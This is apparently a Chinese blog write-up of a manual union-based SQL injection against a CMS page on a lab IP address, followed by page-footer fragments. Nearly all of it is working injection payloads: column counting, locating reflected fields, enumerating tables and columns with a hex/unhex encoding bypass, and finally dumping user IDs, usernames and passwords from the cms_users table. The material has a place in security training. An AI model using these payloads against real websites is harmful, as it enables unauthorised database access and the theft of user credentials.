1、首先判断是字符型还是数字型
确定为数字型
2、猜解字段id=32 order by 15
3、判断数据回显位置 id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
发现只有3和11有回显位置那我们在这两个位置下手获取数据库的名称
?id=-1 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15
4、获取表名
id=-1 union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15%20 from information_schema.tables where table_schema=database()
显示非法混合union查询内容
这里我先试了将cms编码为16进制
http://192.168.221.136/cms/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10, group_concat(table_name),12,13,14,15 from information_schema.tables where table_schema=0x636d73
不行
再试试用hex()和unhex()两个函数绕过
http://192.168.221.136/cms/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,unhex(hex(group_concat(table_name))),12,13,14,15 from information_schema.tables where table_schema=0x636d73
5、接下来就获取cms_users表中的字段
union select 1,2,3,4,5,6,7,8,9,10,unhex(hex(group_concat(column_name))),12,13,14,15 from information_schema.columns where table_schema='cms' and table_name='cms_users'
6、最后查询字段内容
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,group_concat(userid,'~',username,'~',password),12,13,14,15 from cms_users
扫一扫
1198
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
